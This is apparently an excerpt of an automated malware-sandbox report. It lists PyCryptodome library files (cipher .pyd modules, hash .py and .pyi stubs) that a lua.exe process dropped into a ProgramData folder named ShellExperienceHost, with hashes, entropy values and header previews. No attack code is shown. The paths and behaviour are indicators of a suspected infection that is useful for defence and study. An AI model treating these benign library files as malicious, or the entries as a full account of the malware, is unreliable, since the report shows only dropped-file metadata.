MD5:	5B49C26E19E3A491A39E310D56A37A8C
SHA1:	96C8A3A42D5B7575A1765E55601A2465CF67C00F
SHA-256:	0DCD42491A75435A9C4B1A01539A72769A33F85B2FFB90D73017DB571684BCF1
SHA-512:	D7B5EEBC088ADB31D083BD445282CBD2F00FD7D1EC1D574CE5DD017CA8C9DCB1BD307A1D33529AAE39508EBE1F5D28B9BA82F2D029D1AE8E1E130DA6F53075CD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...u.!`.........." .....$..........T.....................................................`..........................................X.......Y..d............p..................0....Q...............................R..8............@...............................text...H#.......$.................. ..`.rdata.......@.......(..............@..@.data...H....`.......F..............@....pdata.......p.......H..............@..@.rsrc................L..............@..@.reloc..0............N..............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	6.493183568458379
Encrypted:	false
SSDEEP:	384:yksGDsFSQkHUleKaZXmrfXA+UA10ol31tuX7QkUdT:lTK0K4XmrXA+NNxWrUd
MD5:	AF2A0A947968B4D7A28B22D5B1EB4AD8
SHA1:	B07888D3DBBB489AFB6FC1A8BF9AEA8F49F2436D
SHA-256:	901CC42B6B49B18AAC3D5452BE9142399833AD0C6DE4FB53D41309BF07974FD1
SHA-512:	B3F1CE32D91C644A7965F686AC5F41617B97007B53463557F76D306D92267D04CC6052C9DCA222B5D27468595A3536D288FE6A4260BC08B66E551E7976F6FAA2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...u.!`.........." .....$...>............................................................`.........................................@h.......h..d...............................0....a...............................a..8............@...............................text...x".......$.................. ..`.rdata...,...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.700766824518145
Encrypted:	false
SSDEEP:	192:6h05p7mr3Tutd9PUv2anKfI1v/86rYDLUa:eD6t/GKfev0TUa
MD5:	FF9B1E03922361E0A8BE65E5E1421AAC
SHA1:	D4D674FB4E0214903E341E98613328D51AFF9054
SHA-256:	2A5AB7F23554F497693CA81A5E5F21647B10FD8B9E00B8377D8385DC15A9C4DF
SHA-512:	8CBBBBDC9A3D9E866DC88A655A75317F58CB4A49CB262975FF8C4AE5D47C344B86F69F6D2FC369DD7AA8AD7FCAA40D1937320E7E4F5923A03A39459B7BB247C0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...w.!`.........." ................T.....................................................`..........................................7.......8..d....`.......P..X............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..$....p......................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	4.9938170073770625
Encrypted:	false
SSDEEP:	192:D3rdk3qQb3GukBPZCLfSQU+x5DLUzbgd6:0NzFkHCLBUzbO
MD5:	06358818F111A1C8E1B76D60A650C997
SHA1:	5BBAF40AEB932766346631DF25D887264AAD7AC2
SHA-256:	B5438682A4C6BF57DCAAD2835A9A293F712284FBE1AF4BA6059011396CDBD180
SHA-512:	F954B4E56E3ACE2C8E0961149CB5BD433F35530BC1C5E38EC5D2223EC3591DF0998903B3928668C5D8C05F16EAA1C2ADF41FC999690C42DAFA794800FC4B193E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@....................@......@......@......f......f......f.~.....f......Rich....................PE..d...w.!`.........." ................T.....................................................`..........................................8......H9..d....`.......P..d............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..$....p.......2..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.2750845012369965
Encrypted:	false
SSDEEP:	192:HtVGzeoI3DuzPpcAdXdO57EEE/quBiFElXUNIDLUnF6+ud:4NYqFcAdXdDqurdUnUp
MD5:	6ADF70FD22D5CA90269466E5FC2ACA2B
SHA1:	1D4CDF2B08154B33738C5244A8886284C71693B9
SHA-256:	2F9DFA9DE351BFE553DDE60AE891E9B54A2E08546D723C7165234FD41C3CEED4
SHA-512:	EFBD7133E5B5EF035F5A09D92B3B12D3AD367D6C35856A842536102D36A1EF53AFE62EA3C3A5A4AE641BB28B6CAAED18AFA3519A637AA36F71F71979D4F61239
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o....................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...x.!`.........." ......... ......T.....................................................`.........................................P9.......:..d....`.......P...............p..$....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..$....p.......8..............@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	56832
Entropy (8bit):	4.230283793776799
Encrypted:	false
SSDEEP:	384:z3gj0/sz71dv/ZHkVnYcZiGKdZHDLIK4vnKAnKorZVzUbq+K9:0jssHZHTr4vZAb69
MD5:	8F33EE07D30DF3D71A9675F38125FF5E
SHA1:	96F6357FA0889E48A366F3221FA89296EAD30924
SHA-256:	E8BBA44E491162904DC067BD586B02A910DB9E11878F5CC3BE3D11E1BA38C304
SHA-512:	E99ED5604C982EC840AF9FF66F38D67916351D20938ED9AC8AF47CCA49245A8008D73CCA61BEAFEE0DF8472C0284EF54429D5242509F0D7787EA6234052EA8F3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Sj..2...2...2...J...2..LC...2...Y...2...2...2..LC...2..LC...2..LC...2..j@...2..j@...2..j@...2..j@...2..Rich.2..........................PE..d...v.!`.........." .....6...................................................0............`.....................................................d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata..T....P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.251322027244203
Encrypted:	false
SSDEEP:	384:ZVgj0/sKzNweVC/ZHkNnYcZiGKdZHDLaK0vnKAnKLrZSwUbqeo:AjsskKZHLR0vZFbx
MD5:	D196B5458175CDE8EB9EB6FC3407BDCD
SHA1:	BDEC1ED3CD5E1D7D1CC03332734566B7965E2D48
SHA-256:	4B9A7E83B59B2D5F84C029660658C9A103FE79CF5F5FE45C0027C0DE5E09FD11
SHA-512:	C649454309E75A27138B3670EB0F3F6519F56F86562D44ACE4CD5593060FA0EF697B07DB57BEAFBFDC6F31384ED290F0B10845FA2C0765139C9F6B2212E0BEEA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Sj..2...2...2...J...2..LC...2...Y...2...2...2..LC...2..LC...2..LC...2..j@...2..j@...2..j@...2..j@...2..Rich.2..........................PE..d...v.!`.........." .....8...................................................0............`.................................................`...d............................ ..0... ...............................@...8............P...............................text...h7.......8.................. ..`.rdata.......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.690783103541396
Encrypted:	false
SSDEEP:	96:5S8MdJTCaDAH37Belrzu1x/r8qJ7pfJsPG6QxmFWymc3doKKumsLVsDJ9UKvL:MTdJTlDmNelrzuLFf0Qg4yxmumQCDLU
MD5:	64F6350FC1145DB6337A9E3DFB83222F
SHA1:	FEA799C3F2A655D5104A46B788D98EA272557AE5
SHA-256:	821A86630238BEAF4E303196CE26A250EF873F7A98B92644566B3C7D683D400E
SHA-512:	58F90099630B98A632DB38D7CC4A2F44C70BB012F55B3B5A69DFFC3A76F6A2B30AB81D678B95E807C135B96633A0D8ED83428924A1C9D1DFDB7F2A3962A44D31
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mr..............t......,}.......g..............,}......,}......,}.......~.......~.......~.......~......Rich............................PE..d...w.!`.........." ................T........................................p............`..........................................&.......'..P....P.......@...............`..$....!...............................!..8............ ...............................text............................... ..`.rdata..p.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....`.......&..............@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	6.2360237881858795
Encrypted:	false
SSDEEP:	384:j2XHEtPwbdvIbwKBBEHYpJgLa0Mp8N9sLgU:aHMobBiB+HqgLa1Px
MD5:	861A67653300202FD334C3F62B67618D
SHA1:	9E8DEA46DBBCCD58D242E464A7A757978B01557F
SHA-256:	1FB0D213B448F87889B273122E4A7957D33F80E2F268E9EB7819E0C58491CB27
SHA-512:	80A388254A0CABEC2982757B271D7C13895485880692BF731F350519D3B15803DF19A775807FB2FF220CC4CE7320F06835917E344BD486D32A3229B5A9B34464
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...u.!`.........." .....(..........T.....................................................`..........................................X.......Y..d............p..................0....Q...............................R..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data...H....`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..0............R..............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.285842616672411
Encrypted:	false
SSDEEP:	384:QxQrFBe/i+/puqeXOv3oTezczeO9p9iY+WYLJzUn:j5B8txuqeXOfoTezcSO9pUYCJY
MD5:	9CF1780E69E1BF2DF2487B4DE72806E5
SHA1:	0955D77AFB6A8E786DCBBF4F0B5B221BC302C6C8
SHA-256:	59CF35C376F312B1C6A5844F0740FCAE4CAAA5A3D3CD0E953959B5F4190A475D
SHA-512:	B1C4E6841C739FCCC86E95DA53AE10C3EFA18F3A747B8E92883E7224CBE4F44016102FB6F713AA4345BA37DBF7C07D5517DFE9D564E2D4D120D154FD7DE717F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...x.!`.........." .....(... ......T.....................................................`.........................................@I......<J..d....p.......`..................$....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..$............D..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.6963922145739225
Encrypted:	false
SSDEEP:	192:p05p7mr3Tutd9PUv22NeLfPIxk3bo7tDLUan:5D6t/N4i3bEZUan
MD5:	670C2BAF75E559B89435283298F75BEF
SHA1:	BE1E5A0711C6C0BB1E2AEF4ED18A15ED5759B027
SHA-256:	236650FC42B347B9CAA5E3A84A13DA9E40586D97762F87730C9016DCB81ABF06
SHA-512:	52554FE5308F7B758B66B48262AAE1C180191358E15FDD85B7D5EF47A35677E079C3EF6A54E63D1520038BBFC79BAD5B2534B1C2808217FFB53C55B7E8862FDB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...x.!`.........." ................T.....................................................`..........................................7.......8..d....`.......P..X............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..$....p......................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\BLAKE2b.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9671
Entropy (8bit):	4.704146546889162
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IYRDPyZmiCbebOg5n8znjoqOGoLk:0rskrs9VqVwUbbeSg58zjoqOFI
MD5:	FDA569C226B9ADA6560AA2B3E28E9646
SHA1:	101F949C60ABEEDA62ADD4CABCBFCE83E5877C29
SHA-256:	5956D3582B3ABDFA1BD0DE0F1575A8978BC4B7B3C47CA0C20CD469C008CF862C
SHA-512:	8ABC586D3663917FCE369C1D3F4D4E75857CD7D8C9ECB941E5FA732A4A3E2E993193FCD3342E331957DF4C83BA3699D7D37EB7111DE93F876594336BAC8D2BEC
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\BLAKE2b.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.746996288581479
Encrypted:	false
SSDEEP:	24:1RE6T37rEWAnm1WWLB/qs/qn/HLB/M4LB/1/s/3LB/QVP:jDQxMB/qs/qn/rB/MGB/1/s/7B/QVP
MD5:	90E04684258D15A5DC6C1E82CD0CAC9E
SHA1:	FDA554FA52FF6EE5DBEF93923CE5CD343A972D63
SHA-256:	41F75D5BF7915141576D81B48A5EA6971651136161FAE2504C9E789881EC5729
SHA-512:	9C44F4E7E55A3A49E876816C079495CA085C45F8D3EB0B08518DD5E8F2112F6EE3B36BFF33C19B24A6E816060812B079F5A3BFB2445B69E7080855D6BE4A1659
Malicious:	false
Preview:	from typing import Any, Union....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2b_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2b_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... digest_bytes: int = ...,... digest_bits: int = ...,... key: Buffer = ...,... update_after_digest: bool = ...) -> BLAKE2b_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2b_Hash: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\BLAKE2s.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9677
Entropy (8bit):	4.694357352499119
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IFU1Uy9XiCJ5bfD5Z8znjJQfgdT:0rskrs9VqIARbJ5DD52zjJQfgx
MD5:	A2B58D4C5D1A2090DBF839D74B026F07
SHA1:	4F2A167158A812D4C33C509B5F6A63EC83BF731E
SHA-256:	AA273C310C3C7C9F49D3B53E60037C254503AA65CFEE8DA41E189E2FFE395490
SHA-512:	256FA12F22C56CF40077C384B5AA4634DAE3AAF386D97C86A9188CF3237F6FFE311667975EF05E12C237793E92755FAEDCCFDE862FD87D15217E625119D6BDEB
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\BLAKE2s.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	765
Entropy (8bit):	4.852088276642615
Encrypted:	false
SSDEEP:	12:1REYBPvIY3MRyaRyLu1ApV2+tCwF5RwW0WFWIZyp4LB/d3/i3/3LB/QVxI:1RE6T3QrEWAnJ1Wr4LB/1/s/3LB/QVi
MD5:	43A377A44F7A80190635F78E745C64C3
SHA1:	FDDEC7439E99FF7376364061B817E985EC291550
SHA-256:	25933F08745028C43450B44E6926A00942023E68BF934D2A4D032B8F9557C251
SHA-512:	8C087F9A1BFF5B0F48A2B766CB4B81BBEF8D18461C9369C71F4431D90343822099A6DAFD74DA565D53D43131A727228BB8487C8503ADC4573E585187B76BDE5C
Malicious:	false
Preview:	from typing import Any, Union....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2s_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2s_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self, **kwargs: Any) -> BLAKE2s_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2s_Hash: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\CMAC.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10653
Entropy (8bit):	4.693201886198827
Encrypted:	false
SSDEEP:	96:HJqFQHvo7ESYvHPXmAzr5zkZYewd/3SIzODA/u42MZcpFYR4Aeqt86+:HJYQHvqAzhkZYPN17ZVvP+
MD5:	3EB2A61175CF5D59F03F53C9DED1E568
SHA1:	490B1822F705144BA6A126D3DF9EDB2EB5BE5573
SHA-256:	C76C6DDEDCB90107CE01086B065EF105B9570B890162194F858928006C5851DD
SHA-512:	819B6041FC9A8DBA183BAB3704BD04356F2650489C69FBF59EFBCB9950532126C228BF65DBB73B9A9A05E212741E9AD93708741A9A7A75A741A7A59F0699F660
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Hash/CMAC.py - Implements the CMAC algorithm..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =============

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\CMAC.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	827
Entropy (8bit):	4.761907013968994
Encrypted:	false
SSDEEP:	24:1RM7C8T3xFFAo64yyW1W2oILB/jHV/vS/Iqw+y:cthf2VB/B/vS/Zw/
MD5:	7D84CBAE365BF5F72672C907FDBC23CF
SHA1:	5651C7F68B762A7A421D66BA39E77DB149B8A95F
SHA-256:	B4D224A81BC8F30874C75B477D2A2055D3DABFE81140F196BB62A3A464BBB783
SHA-512:	659C75C7C479CBED13F91C186366D160F80EC09E1FBAA9237826D27B094BE8170C255B00B8235B3FC7DBFA1465845CA1C46BCC92420CEDCE81D0C533D7810244
Malicious:	false
Preview:	from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class CMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... ciphermod: ModuleType,.... cipher_params: dict,.. mac_len: int, update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> CMAC: ..... def copy(self) -> CMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...ciphermod: ModuleType = ...,...cipher_params: Dict = ...,...mac_len: int = ...,.. update_after_digest: bool = ...) -> CMAC: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\HMAC.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7237
Entropy (8bit):	4.883193404390149
Encrypted:	false
SSDEEP:	96:5J0YDqrYJALrYJHdt3EHGuIWH8EwSY8s9MivBrR8ba/jVtbOixcS2FG2Mz/1FEth:5JLqrskrs9t3q/I0GNRSqzneLl
MD5:	867DC991AEE6554006831EB3830DDBCB
SHA1:	6FDD2FC758252C2FDB8DDB593C376ADE60096801
SHA-256:	7223259365A75E05BAAE2AD7621D85E13F8ABEAAC4F8098E962B51532F91AD5A
SHA-512:	C773917CEBB99C9136A65C8BD902295B3F9DE433858589FBB0AAFA661D290AD77129D4A25E1AD32DDCCF51E643C44D77E5915C907BA295253DA9CD2D3CB9411D
Malicious:	false
Preview:	#..# HMAC.py - Implements the HMAC algorithm as described by RFC 2104...#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAI

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\HMAC.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	649
Entropy (8bit):	4.783061054533155
Encrypted:	false
SSDEEP:	12:1Ro8s7REYB6IvIY3YcRyTkpYRyc1AQ2ZcQ0WrQwgcxW5RwW0WFW2orULB/Q0WHQ4:1RM7C8T3xWFAlrVxW1W2oILB/SH+y
MD5:	14A386A671119C5A919A33425DBB267C
SHA1:	938FCE9D2F2D8D12B4E6DCE66CF634F0597E79C5
SHA-256:	C2C617969E9C441DCC4F844E9B8BA9767F49999272C239BDE88D5F4FAF6A672C
SHA-512:	99637CA962FF596AB9A740A3360DCA5989F0CA1DBC23C90926A213FC50A3E7A5FBC92DDDA0C62625FAA9A273CE9D6D50BFAC8A9D812BEC12DA2AD8CFE1D6D141
Malicious:	false
Preview:	from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class HMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... digestmod: ModuleType) -> None: ..... def update(self, msg: Buffer) -> HMAC: ..... def copy(self) -> HMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...digestmod: ModuleType = ...) -> HMAC: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\MD2.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6277
Entropy (8bit):	4.740289678626214
Encrypted:	false
SSDEEP:	96:MwDqrYJALrYJHdt3EHGuIWHgkIx9LSVHSvtNz8iz1I7NHZDE3aOMz/fXqNagW6:9qrskrs9t3q/IN9L8i4NmKpfLI
MD5:	E481D6B8F9367485C21BE80F7EA069C9
SHA1:	3D3F67C2664934CF57C9705DBAC3B48A8DFF15B5
SHA-256:	2B2CB2D01B12395DDBEA6EC5D66E3CDC8FD5B99BCB81E112FE127299EE24922C
SHA-512:	3C215DF463DDAB0CE241F0898FF6005FC87C61E1249051876D05495AE3619569B18CB917AB9FEE194AFE73698CFCAFA4FC662617E22F17757063C978687B1B1C
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\MD2.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	511
Entropy (8bit):	4.765158993873355
Encrypted:	false
SSDEEP:	12:1REYBjvIY3g2RypRyLu1AwLsQwu5LGLs+4Ls7Ry5Ryn:1REET3g2QEWAwL/0Lz4Lcwy
MD5:	4BC02D61022F9C16DF722B5F84952EE6
SHA1:	C1AC7927C7F367E0ED86236950DC2966326B127C
SHA-256:	3B3C9E78A4313AC9D7935D4AE92C650879BE8F55007478154429919B4794BB42
SHA-512:	9A6729A4346430DAB7D125D5575C955B968B2491F37C75F9ECE46A13A0DA794348F86227EC29A0D700CB5B66F76353D4372439D9EE956DFC43CEF75B62EA9251
Malicious:	false
Preview:	from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Buffer = ...) -> MD4Hash: .......def new(data: Buffer = ...) -> MD4Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\MD4.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6767
Entropy (8bit):	4.77561272659047
Encrypted:	false
